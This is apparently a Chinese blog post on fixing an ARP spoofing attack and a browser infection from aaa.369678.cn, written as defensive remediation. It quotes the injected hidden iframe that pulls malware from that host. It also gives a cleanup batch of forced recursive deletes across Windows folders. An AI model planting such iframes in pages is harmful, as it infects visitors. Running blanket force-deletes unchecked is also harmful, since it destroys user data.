aaa.369678.cn和ARP病毒的分析解决

最近在客户那里遇到了这个病毒：aaa.369678.cn，由于网络同时还存在ARP攻击的状况，导致整个网络陷入瘫痪，所以这里就一并分析解决。

  一、ARP 攻击及其相关 ARP病毒、木马的简单处理：
杀毒的办法这里就不详细介绍了，推荐几款杀毒软件：Macfee、Avira AntiVir PersonalEdition、Symantec AntiVirus v10.2等。 其中Macfee、Symantec软件比较适合双核大内存的电脑使用，如果你的配置是单核的，还是用Avira AntiVir PersonalEdition吧，效果不错，我就是用这个。 国产的杀毒软件当然也可以。企业环境特别是Win2003域的环境下，Symantec的企业版是比较好的选择。 呵呵，说了这么多啰唆的话，有点跑题了。


【表现的症状】：
a、无法上网或者上网很慢

b、ping网关的时候反应很慢：

正常的时候是这样的：
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64

被ARP攻击的时候，常常 time 值会达到几百、几千、甚至干脆丢包：Request timed out.

c、查看本机的ARP映射表，会发现本机的网关MAC地址跟别的正常电脑不一样：
arp -a
192.168.1.1          00-08-5c-b0-8c-3d    Dynamic

【解决办法】
1、进入命令行方式：
    开始-》运行-》cmd

2、在客户机上建立网关（路由器）的静态ARP映射：
    arp  -s  <网关IP>  <网关MAC地址>

上面两步可以保证你在重启前能上网……  那重启后呢？ ………… 这个，由于黔驴技穷，暂时只是用批处理的方法来进行的。 把以下命令复制到命令行运行：

cd /d %ProgramFiles%
echo @echo off  >> AntiARP.BAT
echo arp  -s  网关IP  网关MAC地址 >> AntiARP.BAT

    这时在你的c盘program files下面会生成一个 AntiARP.BAT 文件，右键单击 “发送到”-》“桌面快捷方式”。 接着把生成的快捷方式复制到 开始菜单 -》 所有程序 -》启动 里面。这样，每次启动的时候就会自动运行静态映射命令。

  至于怎么把快捷方式复制到“启动”文件夹，如此“高难度”的问题实在不适合在这里讲解，你要真不会就发Email给我：finaltry@sina.com.cn

    怎样才能获得网关的IP地址、网关的MAC地址？这个可以直接到路由器上看，也可以借助一个叫“Anti Arp Sniffer V2.0”的软件，在这里下载：
Anti Arp Sniffer V2.0
www.newjian.com

二、清理aaa.369678.cn病毒。
【表现症状】
    此病毒非常可恶，它会让你的IE浏览器每次打开网站的时候都连接到 aaa.369678.cn 网站，并且从这个网站下载多种木马、病毒，让你现有杀毒软件（卡巴斯基、avest等)不断地跳出病毒提示，严重拖慢浏览速度，并最终导致IE崩溃。
    分析网页代码，发现每个页面都有如下代码：
    <iframe src="http://aaa.369678.cn/****.htm" width="0" height="0"></iframe>
用“奇虎360”、超级兔子等常规软件扫描，没有发现异常。 可每次开IE浏览的时候都会如此。上网找了一些资料后才把它摆平。

【解决办法】
1、进入系统的安全模式（注意：是不带网络连接的）
    如果你的安全模式被破坏，请用System Repair Engineer修复你的安全模式。

2、打开“任务管理器”

3、把以下内容复制或者新建一个批处理文件：
@echo off
echo 正在清理，请稍等......
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
rd /s/q %temp% & md %temp%
rd /s/q "%userprofile%\Local Settings\Temporary Internet Files"

4、在“任务管理器”的“进程”页面，结束Explorer.exe 进程，然后把上面 3、的命令黏贴到命令行方式执行或者保存为批处理文件再执行！

5、收工。

【备注】此病毒有点特别，工作原理还不是很清楚，好像不是浏览器劫持，全面修复IE后依然无效。估计是网络内部有电脑中毒了，然后利用系统的漏洞不断攻击其他电脑。